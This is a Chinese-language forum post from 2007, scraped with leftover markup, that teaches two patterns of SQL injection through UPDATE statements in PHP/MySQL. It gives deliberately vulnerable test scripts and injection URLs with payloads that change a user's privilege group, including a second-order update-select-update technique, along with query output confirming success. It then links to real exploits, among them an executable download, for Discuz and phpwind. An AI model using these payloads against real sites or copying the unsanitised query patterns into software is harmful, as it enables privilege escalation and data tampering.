来玩吧论坛-海外华人完全娱乐中心 » 【=软件综合=】 » 【=PHPer=】 » UPDATE注射(mysql+php)的两个模式

查看完整版本: UPDATE注射(mysql+php)的两个模式

lily 2007-8-2 13:36

UPDATE注射(mysql+php)的两个模式

一.测试环境： 　　OS: Windowsxp sp2 　　php: php 4.3.10 ( 　　<a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, 'mysql');" target="_self">mysql</a> 4.1.9 　　<a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, 'apache');" target="_self">apache</a> 1.3.33 　　二.测试<a href="http://www.phpchina.com/javascript:;" onClick="javascript:tagshow(event, '%CA%FD%BE%DD%BF%E2');" target="_self">数据库</a>结构： <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1><TBODY><TR><TD class=code bgColor=#e6e6e6>-----start--- -- 数据库: `test` -- -- -------------------------------------------------------- -- -- 表的结构 `userinfo` -- CREATE TABLE `userinfo` ( `groudid` varchar(12) NOT NULL default ’1’, `user` varchar(12) NOT NULL default ’heige’, `pass` varchar(122) NOT NULL default ’123456’ ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- 导出表中的数据 `userinfo` -- INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’); ------end-------</TD></TR></TBODY></TABLE>三.测试模式： 　　1,变量没有带’’或""[MOD1] <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1><TBODY><TR><TD class=code bgColor=#e6e6e6><PRE><?php //test1.php Mod1 servername = "localhost"; dbusername = "root"; dbpassword = ""; dbname = "test"; mysql_connect(servername,dbusername,dbpassword) or die ("数据库连接失败"); sql = "update userinfo set pass=p where user=’heige’";//<--P没有使用单引号 result = mysql_db_query(dbname, sql); userinfo = mysql_fetch_array(result); echo "SQL Query:sql"; ?></PRE></TD></TR></TBODY></TABLE> 　　脚本里只是修改user=’heige’的pass，如果groudid表示用户的权限等级，我们的目的就是通过构造p 来达 　　到修改groupid的目的： 　　那么我们提交：http://127.0.0.1/test1.php?p=123456,groudid=1 　　在mysql里查询： <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1><TBODY><TR><TD class=code bgColor=#e6e6e6>mysql> select * from userinfo; +---------+-------+--------+ | groudid | user | pass | +---------+-------+--------+ | 1 | heige | 123456 | +---------+-------+--------+ 1 row in set (0.01 sec)</TD></TR></TBODY></TABLE>用户heige的groudid又2改为1了 :) 　　所以我们可以得到没有’’或"" update的注射是可以成功的，这个就是我们的模式1。 　　2,变量带’’或""[MOD2] <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1><TBODY><TR><TD class=code bgColor=#e6e6e6><?php //test2.php servername = "localhost"; dbusername = "root"; dbpassword = ""; dbname = "test"; mysql_connect(servername,dbusername,dbpassword) or die ("数据库连接失败"); sql = "update userinfo set pass=’p’ where user=’heige’";//<--P使用单引号 result = mysql_db_query(dbname, sql); userinfo = mysql_fetch_array(result); echo " SQL Query:sql "; ?></TD></TR></TBODY></TABLE>　　为了关闭’我们构造p应该为123456’,groudid=’2 提交： 　　http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了\’ 　　提交的语句变成：SQL Query:update userinfo set pass=’123456\’,groudid=\’1’ where user=’heige’mysql查询： <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1><TBODY><TR><TD class=code bgColor=#e6e6e6>mysql> select * from userinfo; +---------+-------+--------------------+ | groudid | user | pass | +---------+-------+--------------------+ | 2 | heige | 123456’,groudid=’1 | +---------+-------+--------------------+ 1 row in set (0.00 sec) </TD></TR></TBODY></TABLE> 　　groudid并没有被修改。那么在变量被’’或""时就完全没有被注射呢？不是下面我们看模式2： <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1><TBODY><TR><TD class=code bgColor=#e6e6e6><?php //test3.php Mod2 servername = "localhost"; dbusername = "root"; dbpassword = ""; dbname = "test"; mysql_connect(servername,dbusername,dbpassword) or die ("数据库连接失败"); sql = "update userinfo set pass=’p’ where user=’heige’";//<--P使用单引号 result = mysql_db_query(dbname, sql); mysql_fetch_array(result); //p的数据写入数据库 sql= "select pass from userinfo where user=’heige’"; result = mysql_db_query(dbname, sql); userinfo=mysql_fetch_array(result); echo userinfo[0]; //把pass查询输出给userinfo[0] sql ="update userinfo set pass=’userinfo[0]’ where user=’heige’"; result = mysql_db_query(dbname, sql); mysql_fetch_array(result); //把userinfo[0] 再次update ?> </TD></TR></TBODY></TABLE>我们测试下，提交：http://127.0.0.1/test3.php?p=123456’,groudid=’1 　　回mysql查询下： <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1><TBODY><TR><TD class=code bgColor=#e6e6e6>mysql> select * from userinfo; +---------+-------+--------+ | groudid | user | pass | +---------+-------+--------+ | 1 | heige | 123456 | +---------+-------+--------+ 1 row in set (0.00 sec)</TD></TR></TBODY></TABLE> 　　HaHa~~ 成功注射修改groudid为1。这个就是我们的模式2了，简单的描叙如下： 　　update-->select-->update 　　四.实际模式 　　模式1：Discuz 2.0/2.2 register.php 注射 　　漏洞分析：http://4ngel.net/article/41.htm 　　Discuz 2.0/2.2 register.php Remote Exploit ：http://4ngel.net/project/discuz_reg.htm 　　模式2：phpwind 2.0.2和3.31e 权限提升漏洞 <TABLE cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=black border=1><TBODY><TR><TD class=code bgColor=#e6e6e6>漏洞分析： update (profile.php 注射变量为proicon update语句里为,icon=’userdb[icon]’） | v select (jop.php) | v updtate (jop.php) Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe</TD></TR></TBODY></TABLE> 　　五.鸣谢 　　特别感谢saiy等朋友的讨论和帮助。Thanks!!! <center><input type="image" onclick=copyToClipBoard() src="http://www.phpchina.com/images/phpcn_book_bu_tj.gif" border="0"></center>

页: [1]

查看完整版本: UPDATE注射(mysql+php)的两个模式